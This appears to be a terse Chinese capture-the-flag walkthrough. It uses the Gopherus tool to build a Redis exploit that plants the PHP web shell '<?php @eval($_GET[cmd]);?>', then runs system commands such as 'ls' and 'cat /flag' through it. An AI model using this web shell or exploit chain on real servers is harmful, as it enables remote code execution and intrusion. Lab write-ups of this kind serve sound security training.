第一步:打开环境
第二步:打开kali输入命令
python2 gopherus.py --exploit redis
PHPShell
<?php @eval($_GET[cmd]);?>
第三步:url编码
第四步:打开地址栏直接输入
第五步:输入系统命令,查看当前目录
cmd=system('ls');
第六步:查看根目录,看到flag的文件
ls / 查看根目录
第七步:cat查看flag的文件
cmd=system(cat /flag文件)